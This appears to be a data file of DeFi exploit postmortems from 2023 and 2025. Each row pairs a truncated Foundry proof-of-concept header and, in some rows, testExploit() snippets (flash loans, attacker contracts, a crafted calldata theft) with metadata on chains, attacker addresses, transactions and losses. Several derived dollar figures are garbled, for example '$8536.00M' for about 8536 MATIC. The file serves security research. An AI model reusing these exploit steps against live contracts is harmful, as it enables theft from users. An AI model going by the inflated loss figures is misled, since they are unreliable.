// Attack Contract : https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e9... | exploit_poc | DAppSocial | 2023-09 | DAppSocial_exp.sol | null | 37b936e6a043cb5f | 2026-01-07T10:59:16.531651 | postmortems | ethereum | 18,048,982 | ~$16K | 16,000 | https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26 | https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e92a81066b3fbfee2 | https://etherscan.io/address/0x319ec3ad98cf8b12a8be5719fec6e0a9bb1ad0d1 | https://etherscan.io/tx/0xbd72bccec6dd824f8cac5d9a3a2364794c9272d7f7348d074b580e3c6e44312e | null | null | true | true | false | medium | ~$16K | unknown | function testExploit() public {
deal(address(USDT), address(this), 5e6);
deal(address(USDC), address(this), 5e6);
helperExploitContract = new HelperExploitContract();
USDT.approve(address(DAppSocial), 2e6);
USDC.approve(address(DAppSocial), 2e6);
emit log_named_decimal_u... | true | ~$16K | https://etherscan.io/address/0x7d9bc45a9abda926a7ce63f78759dbfa9ed72e26 | https://etherscan.io/address/0xe897c0f9443785f8d4f0fa6e92a81066b3fbfee2 | https://etherscan.io/address/0x319ec3ad98cf8b12a8be5719fec6e0a9bb1ad0d1 | https://etherscan.io/tx/0xbd72bccec6dd824f8cac5d9a3a2364794c9272d7f7348d074b580e3c6e44312e | $16.0K | 8.11 | high | DAppSocial Exploit (2023-09) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~4K USD$
// Attacker : https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8
// Attack Contract : https://bscscan.com/address/0x0f41f9146de354e5ac6bb399... | exploit_poc | DEXRouter | 2023-09 | DEXRouter_exp.sol | null | 5ab908f0cf524f36 | 2026-01-07T10:59:16.531702 | postmortems | bsc | 32,161,325 | ~4K USD$ | 4,000 | https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8 | https://bscscan.com/address/0x0f41f9146de354e5ac6bb3996e2e319dc8a3bb7f | null | https://bscscan.com/tx/0xf77c5904da98d3d4a6e651d0846d35545ef5ca0b969132ae81a9c63e1efc2113 | null | null | true | true | false | low | ~4K USD$ | unknown | function testExploit() public {
deal(address(this), 0 ether);
emit log_named_decimal_uint("Attacker BNB balance before exploit", address(this).balance, 18);
// DEXRouter will call back to function with selector "0xe44a73b7". Look at fallback function
DEXRouter.update(address(this), addre... | true | ~4K USD$ | https://bscscan.com/address/0x09039e2082a0a815908e68bd52b86f96573768e8 | https://bscscan.com/address/0x0f41f9146de354e5ac6bb3996e2e319dc8a3bb7f | https://bscscan.com/tx/0xf77c5904da98d3d4a6e651d0846d35545ef5ca0b969132ae81a9c63e1efc2113 | $4.0K | 6.11 | medium | DEXRouter Exploit (2023-09) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~8536 MATIC (This tx exploit 3211 MATIC)
// Attacker : https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa
// Attack Contract : https://polygonsca... | exploit_poc | FireBirdPair | 2023-09 | FireBirdPair_exp.sol | flash_loan | aaab22a5f0c7431d | 2026-01-07T10:59:16.531746 | postmortems | polygon | 48,149,138 | ~8536 MATIC (This tx exploit 3211 MATIC) | 8,536,000,000 | https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa | https://polygonscan.com/address/0x22b1a115b16395e5ebd50f4f82aef3a159e1c6d1 | https://polygonscan.com/address/0x5e9cd0861f927adeccfeb2c0124879b277dd66ac | https://polygonscan.com/tx/0x96d80c609f7a39b45f2bb581c6ba23402c20c2b6cd528317692c31b8d3948328 | null | null | true | false | true | critical | ~8536 MATIC (This tx exploit 3211 MATIC) | flash-loan | false | ~8536 MATIC (This tx exploit 3211 MATIC) | https://polygonscan.com/address/0x8e83cd1bad00cf933b86214aaaab4db56abf68aa | https://polygonscan.com/address/0x22b1a115b16395e5ebd50f4f82aef3a159e1c6d1 | https://polygonscan.com/address/0x5e9cd0861f927adeccfeb2c0124879b277dd66ac | https://polygonscan.com/tx/0x96d80c609f7a39b45f2bb581c6ba23402c20c2b6cd528317692c31b8d3948328 | $8536.00M | 8 | high | FireBirdPair Exploit (2023-09) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 59.5 ETH and ~72.1k USDT (~$169k)
// Attacker : https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089
// Attack Contract : https://bscscan.com/address/0... | exploit_poc | APIG | 2023-09 | APIG_exp.sol | null | 5ddad8af77415dce | 2026-01-07T10:59:16.531813 | postmortems | bsc | 31,562,012 | 59.5 ETH and ~72.1k USDT (~$169k) | 59.5 | https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089 | https://bscscan.com/address/0xfdc6a621861ed2a846ab475c623e13764f6a5ad0 | null | https://bscscan.com/tx/0x66dee84591aeeba6e5f31e12fe728f2ddc79a06426036793487a980c3b952947 | null | https://twitter.com/CertiKAlert/status/1700128158647734745 | true | true | false | low | 59.5 ETH and ~72.1k USDT (~$169k) | unknown | false | 59.5 ETH and ~72.1k USDT (~$169k) | https://bscscan.com/address/0x73d80500b30a6ca840bfab0234409d98cf588089 | https://bscscan.com/address/0xfdc6a621861ed2a846ab475c623e13764f6a5ad0 | https://bscscan.com/tx/0x66dee84591aeeba6e5f31e12fe728f2ddc79a06426036793487a980c3b952947 | https://twitter.com/CertiKAlert/status/1700128158647734745 | $60 | 5.35 | medium | APIG Exploit (2023-09) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~0.5 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0xa4659632a983b3bfd1b6248fd52d8f247a9fcdc1915f7d38f01008cff285d0bf
// Attacker : https://etherscan.io/address/... | exploit_poc | QuantumWN | 2023-09 | QuantumWN_exp.sol | flash_loan | 50a9fd18548d4a27 | 2026-01-07T10:59:16.531862 | postmortems | ethereum | 18,070,348 | ~0.5 ETH | 0.5 | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0x154863eb71de4a34f88ea57450840eab1c71aba6 | null | null | null | null | true | false | true | low | ~0.5 ETH | flash-loan | function testExploit() public {
address[] memory token = new address[](1);
token[0] = address(WETH);
uint256[] memory amount = new uint256[](1);
amount[0] = 5 ether;
balancer.flashLoan(address(this), token, amount, hex"28");
emit log_named_decimal_uint("[End] Attacker WET... | true | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0x154863eb71de4a34f88ea57450840eab1c71aba6 | $0 | 6.56 | medium | QuantumWN Exploit (2023-09) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 30.5BNB
// Attacker : https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5
// Attack Contract : https://bscscan.com/address/0xd7a2fc756e1053b152f909901... | exploit_poc | HCT | 2023-09 | HCT_exp.sol | flash_loan | f1061225cbfdbc9b | 2026-01-07T10:59:16.531907 | postmortems | bsc | 31,528,198 | 30.5BNB | 30,500,000,000 | https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5 | https://bscscan.com/address/0xd7a2fc756e1053b152f90990129f94c573e006fd | null | https://bscscan.com/tx/0x84bd77f25cc0db493c339a187c920f104a69f89053ab2deabb93c35220e6dfc0 | null | https://twitter.com/leovctech/status/1699775506785198499 | true | true | true | critical | 30.5BNB | flash-loan | false | 30.5BNB | https://bscscan.com/address/0xc892d5576c65e5b0db194c1a28aa758a43bb42a5 | https://bscscan.com/address/0xd7a2fc756e1053b152f90990129f94c573e006fd | https://bscscan.com/tx/0x84bd77f25cc0db493c339a187c920f104a69f89053ab2deabb93c35220e6dfc0 | https://twitter.com/leovctech/status/1699775506785198499 | $30500.00M | 5.92 | medium | HCT Exploit (2023-09) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~8ETH
// Attacker : https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
// Attack Contract : https://etherscan.io/address/0x8faa53a742fc732b04db4090a... | exploit_poc | HeavensGate | 2023-09 | HeavensGate_exp.sol | null | 3788180a3b726a75 | 2026-01-07T10:59:16.531963 | postmortems | ethereum | null | ~8ETH | 8 | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0x8faa53a742fc732b04db4090a21e955fe5c230be | null | https://etherscan.io/tx/0xe28ca1f43036f4768776805fb50906f8172f75eba3bf1d9866bcd64361fda834 | null | https://twitter.com/hexagate_/status/1699003711937216905 | true | true | false | low | ~8ETH | unknown | false | ~8ETH | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0x8faa53a742fc732b04db4090a21e955fe5c230be | https://etherscan.io/tx/0xe28ca1f43036f4768776805fb50906f8172f75eba3bf1d9866bcd64361fda834 | https://twitter.com/hexagate_/status/1699003711937216905 | $8 | 5.09 | medium | HeavensGate Exploit (2023-09) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~ 56.9 BNB
// Attacker : https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1
// Attack Contract : https://bscscan.com/address/0x202e059a16d29a2f6ae030... | exploit_poc | XSDWETHpool | 2023-09 | XSDWETHpool_exp.sol | flash_loan | ebbf1e5555f88dc6 | 2026-01-07T10:59:16.532012 | postmortems | bsc | 32,086,901 | ~ 56.9 BNB | 56,900,000,000 | https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1 | https://bscscan.com/address/0x202e059a16d29a2f6ae0307ae3d574746b2b6305 | https://bscscan.com/address/0xfadda925e10d07430f5d7461689fd90d3d81bb48 | https://bscscan.com/tx/0xbdf76f22c41fe212f07e24ca7266d436ef4517dc1395077fabf8125ebe304442 | null | https://twitter.com/CertiKAlert/status/1706765042916450781 | true | true | true | critical | ~ 56.9 BNB | flash-loan | false | ~ 56.9 BNB | https://bscscan.com/address/0x506eebd8d6061202a8e8fc600bb3d5d41f475ee1 | https://bscscan.com/address/0x202e059a16d29a2f6ae0307ae3d574746b2b6305 | https://bscscan.com/address/0xfadda925e10d07430f5d7461689fd90d3d81bb48 | https://bscscan.com/tx/0xbdf76f22c41fe212f07e24ca7266d436ef4517dc1395077fabf8125ebe304442 | https://twitter.com/CertiKAlert/status/1706765042916450781 | $56900.00M | 7.55 | medium | XSDWETHpool Exploit (2023-09) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 8.495 ETH
// Attacker : https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952
// Attack Contract : https://etherscan.io/address/0x9926796371e0107abe406... | exploit_poc | SBRToken | 2025-03 | SBRToken_exp.sol | null | dde1b1a8d650a23e | 2026-01-07T10:59:16.532069 | postmortems | ethereum | 21,991,722 | ~ 8.495 ETH | 8.495 | https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952 | https://etherscan.io/address/0x9926796371e0107abe406128fa801fda0e436f44 | null | https://etherscan.io/tx/0xe4c1aeacf8c93f8e39fe78420ce7a114ecf59dea90047cd2af390b30af54e7b9 | null | https://x.com/TenArmorAlert/status/1897826817429442652 | true | true | false | low | ~ 8.495 ETH | unknown | function testExploit() public {
emit log_named_decimal_uint("ETH before attack", attacker.balance, 18);
vm.prank(attacker);
AttackerC attC = new AttackerC{value: 0.000000000000004 ether}();
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("ETH after attack", a... | true | ~ 8.495 ETH | https://etherscan.io/address/0x7a6488348a7626c10e35df9ae0a2ad916a56a952 | https://etherscan.io/address/0x9926796371e0107abe406128fa801fda0e436f44 | https://etherscan.io/tx/0xe4c1aeacf8c93f8e39fe78420ce7a114ecf59dea90047cd2af390b30af54e7b9 | https://x.com/TenArmorAlert/status/1897826817429442652 | $8 | 6.3 | medium | SBRToken Exploit (2025-03) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 11902 BUSD
// Attacker : https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e
// Attack Contract : https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF... | exploit_poc | BBXToken | 2025-03 | BBXToken_exp.sol | null | 43b4dac569560de6 | 2026-01-07T10:59:16.532124 | postmortems | bsc | 47,626,457 | 11902 BUSD | 11,902,000,000,000 | https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e | https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF712c954DDEA93898 | https://bscscan.com/address/0x6051428b580f561b627247119eed4d0483b8d28e | https://bscscan.com/tx/0x0dd486368444598610239b934dd9e8c6474a06d11380d1cfec4d91568b5ac581 | https://blog.solidityscan.com/bbx-token-hack-analysis-f2e962c00ee5 | https://x.com/TenArmorAlert/status/1916312483792408688 | true | true | false | critical | 11902 BUSD | unknown | function testExploit() public {
// Deploy the attack contract
vm.prank(attacker);
AttackerC attC = new AttackerC{value: 0.05 ether}();
vm.roll(47626727 - 1); // Attack tx block
vm.warp(block.timestamp + 15 * 60); // Warp time
vm.startPrank(attacker);
attC.attac... | true | 11902 BUSD | https://bscscan.com/address/0x8aea7516b3b6aabf474f8872c5e71c1a7907e69e | https://bscscan.com/address/0x0489E8433e4E74fB1ba938dF712c954DDEA93898 | https://bscscan.com/address/0x6051428b580f561b627247119eed4d0483b8d28e | https://bscscan.com/tx/0x0dd486368444598610239b934dd9e8c6474a06d11380d1cfec4d91568b5ac581 | https://blog.solidityscan.com/bbx-token-hack-analysis-f2e962c00ee5 | https://x.com/TenArmorAlert/status/1916312483792408688 | $11902000.00M | 8.26 | high | BBXToken Exploit (2025-03) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH)
// Original Attacker : https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c
// Attack Contract(Main)... | exploit_poc | LeverageSIR | 2025-03 | LeverageSIR_exp.sol | null | b6a86d04c18800cd | 2026-01-07T10:59:16.532202 | postmortems | ethereum | 22,157,900 | ~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH) | 353,800 | https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c | null | https://etherscan.io/address/0xb91ae2c8365fd45030aba84a4666c4db074e53e7 | https://etherscan.io/tx/0xa05f047ddfdad9126624c4496b5d4a59f961ee7c091e7b4e38cee86f1335736f | null | null | true | false | false | high | ~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH) | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC_A attC_A = new AttackerC_A();
AttackerC_B attC_B = new AttackerC_B();
while (address(attC_A) < address(attC_B)) {
attC_B = new AttackerC_B();
}
attC_A.attack(attC_B);
console2.log... | true | ~ 353.8 K (17814,86 USDC, 1,4085 WBTC, 119,87 WETH) | https://etherscan.io/address/0x27defcfa6498f957918f407ed8a58eba2884768c | https://etherscan.io/address/0xb91ae2c8365fd45030aba84a4666c4db074e53e7 | https://etherscan.io/tx/0xa05f047ddfdad9126624c4496b5d4a59f961ee7c091e7b4e38cee86f1335736f | $353.8K | 9 | high | LeverageSIR Exploit (2025-03) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 4.5M
// Attacker : https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e
// Attack Contract : https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C7... | exploit_poc | OneInchFusionV1SettlementHack.sol | 2025-03 | OneInchFusionV1SettlementHack.sol_exp.sol | null | 645d24d86640b12b | 2026-01-07T10:59:16.532374 | postmortems | ethereum | null | 4.5M | 4,500,000 | https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e | https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C781F36706970C9 | https://etherscan.io/address/0xa88800cd213da5ae406ce248380802bd53b47647 | https://etherscan.io/tx/0x62734ce80311e64630a009dd101a967ea0a9c012fabbfce8eac90f0f4ca090d6 | https://blog.decurity.io/yul-calldata-corruption-1inch-postmortem-a7ea7a53bfd9 | https://x.com/DecurityHQ/status/1898069385199153610 | true | true | false | critical | 4.5M | unknown | function testExploit() public {
uint256 AMOUNT_TO_STEAL = 0xE8D4A51000; // 1M
bytes1 _CONTINUE_INTERACTION = 0x00;
// Beauty of abi encoding, discerning between a dynamic type that's bytes(0) (thus getting a dynamic offset),
// and a static type inplace is not possible, so masquerading... | true | 4.5M | https://etherscan.io/address/0xA7264a43A57Ca17012148c46AdBc15a5F951766e | https://etherscan.io/address/0x019BfC71D43c3492926D4A9a6C781F36706970C9 | https://etherscan.io/address/0xa88800cd213da5ae406ce248380802bd53b47647 | https://etherscan.io/tx/0x62734ce80311e64630a009dd101a967ea0a9c012fabbfce8eac90f0f4ca090d6 | https://blog.decurity.io/yul-calldata-corruption-1inch-postmortem-a7ea7a53bfd9 | https://x.com/DecurityHQ/status/1898069385199153610 | $4.50M | 9 | high | OneInchFusionV1SettlementHack.sol Exploit (2025-03) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 22470 USD
// Attacker : https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e
// Attack Contract : https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5... | exploit_poc | H2O | 2025-03 | H2O_exp.sol | null | b278332219ba261a | 2026-01-07T10:59:16.532494 | postmortems | bsc | 47,454,899 | 22470 USD | 22,470 | https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e | https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5707e6214e8c6e0d | https://bscscan.com/address/0xe9c4d4f095c7943a9ef5ec01afd1385d011855a1 | null | null | null | true | false | false | medium | 22470 USD | unknown | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
// Fund the contract
deal(BUSD, address(attC), 300 ether);
// 1st attack(No profit): https://bscscan.com/tx/0x729c502a7dfd5332a9bdbcacec97137899ecc82c17d0797b9686a7f9f6005cb7
_setRand... | true | 22470 USD | https://bscscan.com/address/0x8842dd26fd301c74afc4df12e9cdabd9db107d1e | https://bscscan.com/address/0x03ca8b574dd4250576f7bccc5707e6214e8c6e0d | https://bscscan.com/address/0xe9c4d4f095c7943a9ef5ec01afd1385d011855a1 | $22.5K | 7.65 | medium | H2O Exploit (2025-03) | true | true | false | false | |||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 14K USD
// Attacker : https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613
// Attack Contract : https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e
// Vulnerable Contract ... | exploit_poc | UNI | 2025-03 | UNI_exp.sol | null | cd1e4a6dc0fca9ae | 2026-01-07T10:59:16.532558 | postmortems | ethereum | 21,992,033 | 14K USD | 14,000 | https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613 | https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e | https://etherscan.io/address/0x76ea342bc038d665e8a116392c82552d2605eda1 | https://app.blocksec.com/explorer/tx/eth/0x6c8aed8d0eab29416cd335038cd5ee68c5e27bfb001c9eac7fc14c7075ed4420?line=0 | https://x.com/CertiKAlert/status/1897973904653607330 | https://x.com/CertiKAlert/status/1897973904653607330 | true | true | false | medium | 14K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC{value: 4e-15 ether}();
// deal(address(attC), 4e-15 ether);
vm.stopPrank();
emit... | true | 14K USD | https://etherscan.io/address/0x97d8170e04771826a31c4c9b81e9f9191a1c8613 | https://etherscan.io/address/0x2901c8b8e6d9f2c9f848987ded74b776ab1f973e | https://etherscan.io/address/0x76ea342bc038d665e8a116392c82552d2605eda1 | https://app.blocksec.com/explorer/tx/eth/0x6c8aed8d0eab29416cd335038cd5ee68c5e27bfb001c9eac7fc14c7075ed4420?line=0 | https://x.com/CertiKAlert/status/1897973904653607330 | https://x.com/CertiKAlert/status/1897973904653607330 | $14.0K | 8.15 | high | UNI Exploit (2025-03) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import {Test, console} from "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~442k
// Attacker : https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff
// Attack Contract : https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a... | exploit_poc | DCFToken | 2025-03 | DCFToken_exp.sol | null | c60778c70968bcd8 | 2026-01-07T10:59:16.532672 | postmortems | bsc | 44,290,969 | ~442k | 442,000 | https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff | https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a47589 | https://bscscan.com/address/0x8487f846d59f8fb4f1285c64086b47e2626c01b6 | https://bscscan.com/tx/0xb375932951c271606360b6bf4287d080c5601f4f59452b0484ea6c856defd6fd | null | https://x.com/Phalcon_xyz/status/1860890801909190664 | true | true | false | high | ~442k | unknown | function testExploit() public {
attack_Contract.exploit();
}
}
contract Attack_Contract {
struct Pancake {
address addr;
uint amount;
bool bUSDIndex;
}
address[] path = new address[](2);
Pancake[] pancakeV3Pools;
Pancake[] pancakeSwapV2s;
IBEP20 BUSD = IBEP20... | true | ~442k | https://bscscan.com/address/0x00c58434f247dfdca49b9ee82f3013bac96f60ff | https://bscscan.com/address/0x77ab960503659711498a4c0bc99a84e8d0a47589 | https://bscscan.com/address/0x8487f846d59f8fb4f1285c64086b47e2626c01b6 | https://bscscan.com/tx/0xb375932951c271606360b6bf4287d080c5601f4f59452b0484ea6c856defd6fd | https://x.com/Phalcon_xyz/status/1860890801909190664 | $442.0K | 9 | high | DCFToken Exploit (2025-03) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 5 ETH
// Attacker : https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0
// Attack Contract : https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7... | exploit_poc | DUCKVADER | 2025-03 | DUCKVADER_exp.sol | null | 8566d9a0bda4c8c6 | 2026-01-07T10:59:16.532764 | postmortems | base | null | ~ 5 ETH | 5 | https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0 | https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7ee03043a91ff | https://basescan.org/address/0xaa8f35183478b8eced5619521ac3eb3886e98c56 | https://basescan.org/tx/0x9bb1401233bb9172ede2c3bfb924d5d406961e6c63dee1b11d5f3f79f558cae4 | null | https://x.com/TenArmorAlert/status/1899378096056201414 | true | true | false | low | ~ 5 ETH | unknown | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
attackContract.attack();
}
receive() external payable {
// This contract is used to receive ETH from the attack contract
}
}
contract AttackContract {
address attacker;
constru... | true | ~ 5 ETH | https://basescan.org/address/0x2383a550e40a61b41a89da6b91d8a4a2452270d0 | https://basescan.org/address/0x652f9ac437a870ce273a0be9d7e7ee03043a91ff | https://basescan.org/address/0xaa8f35183478b8eced5619521ac3eb3886e98c56 | https://basescan.org/tx/0x9bb1401233bb9172ede2c3bfb924d5d406961e6c63dee1b11d5f3f79f558cae4 | https://x.com/TenArmorAlert/status/1899378096056201414 | $5 | 7.4 | medium | DUCKVADER Exploit (2025-03) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 11.29 BNB ($6.4K)
// Attacker : https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3
// Attack Contract : https://bscscan.com/address/0x0e220c6c52d383869a... | exploit_poc | Pump | 2025-03 | Pump_exp.sol | null | 1956a607bb13d47b | 2026-01-07T10:59:16.532820 | postmortems | bsc | null | ~ 11.29 BNB ($6.4K) | 11,290,000,000 | https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3 | https://bscscan.com/address/0x0e220c6c52d383869a5085ef074b6028254b3462 | null | https://bscscan.com/tx/0xdebaa13fb06134e63879ca6bcb08c5e0290bdbac3acf67914c0b1dcaf0bdc3dd | null | https://x.com/TenArmorAlert/status/1897115993962635520 | true | true | false | critical | ~ 11.29 BNB ($6.4K) | unknown | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
address[] memory tokenPairs = new address[](4);
tokenPairs[0] = TAGAIFUN_TOKEN;
tokenPairs[1] = GROK_TOKEN;
tokenPairs[2] = PEPE_TOKEN;
tokenPairs[3] = TEST_TOKEN;
att... | true | ~ 11.29 BNB ($6.4K) | https://bscscan.com/address/0x5d6e908c4cd6eda1c2a9010d1971c7d62bdb5cd3 | https://bscscan.com/address/0x0e220c6c52d383869a5085ef074b6028254b3462 | https://bscscan.com/tx/0xdebaa13fb06134e63879ca6bcb08c5e0290bdbac3acf67914c0b1dcaf0bdc3dd | https://x.com/TenArmorAlert/status/1897115993962635520 | $11290.00M | 7.64 | medium | Pump Exploit (2025-03) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "../basetest.sol";
import {IERC20, WETH} from "../interface.sol";
// @KeyInfo - Total Lost : ~767 US$
// Attacker : 0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Contract : 0x3783c91ee49a303c17c558f92bf8d6395d2f76e3
// Vulnerable Contract ... | exploit_poc | wKeyDAO | 2025-03 | wKeyDAO_exp.sol | flash_loan | a57e27c90817272b | 2026-01-07T10:59:16.532876 | postmortems | unknown | 47,469,060 | ~767 US$ | 767 | null | null | null | https://app.blocksec.com/explorer/tx/bsc/0xc9bccafdb0cd977556d1f88ac39bf8b455c0275ac1dd4b51d75950fb58bad4c8?line=12 | https://x.com/Phalcon_xyz/status/1900809936906711549 | null | true | true | true | low | ~767 US$ | flash-loan | function testPoC() public {
vm.startPrank(attacker);
Attacker attc = new Attacker();
uint balanceBefore = IERC20(BUSD).balanceOf(address(attc));
attc.fire();
uint balanceAfter = IERC20(BUSD).balanceOf(address(attc));
console2.log("Profit: ", (balanceAfter - balanceB... | true | ~767 US$ | https://app.blocksec.com/explorer/tx/bsc/0xc9bccafdb0cd977556d1f88ac39bf8b455c0275ac1dd4b51d75950fb58bad4c8?line=12 | https://x.com/Phalcon_xyz/status/1900809936906711549 | $767 | 8.5 | high | wKeyDAO Exploit (2025-03) | true | false | true | true | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 376 BNB
// Attacker : https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453
// Attack Contract :
// Vulnerable Contract : https://bscscan.com/address/0x7fdf... | exploit_poc | YziAIToken | 2025-03 | YziAIToken_exp.sol | null | 6c174b496ae02355 | 2026-01-07T10:59:16.532934 | postmortems | bsc | null | ~ 376 BNB | 376,000,000,000 | https://bscscan.com/address/0x63fc3ff98de8d5ca900e68e6c6f41a7ca949c453 | null | https://bscscan.com/address/0x7fdff64bf87bad52e6430bda30239bd182389ee3 | https://bscscan.com/tx/0x4821392c0b27a4acc952ff51f07ed5dc74d4b67025c57232dae44e4fef1f30e8 | null | https://x.com/TenArmorAlert/status/1905528525785805027 | true | true | false | critical | ~ 376 BNB | unknown | function testExploit() public {
emit log_named_decimal_uint("BNB balance before attack", attacker.balance, 18);
vm.startPrank(attacker);
IERC20(YziAI).transferFrom(CAKE_LP, CAKE_LP, 1_199_002_345);
vm.stopPrank();
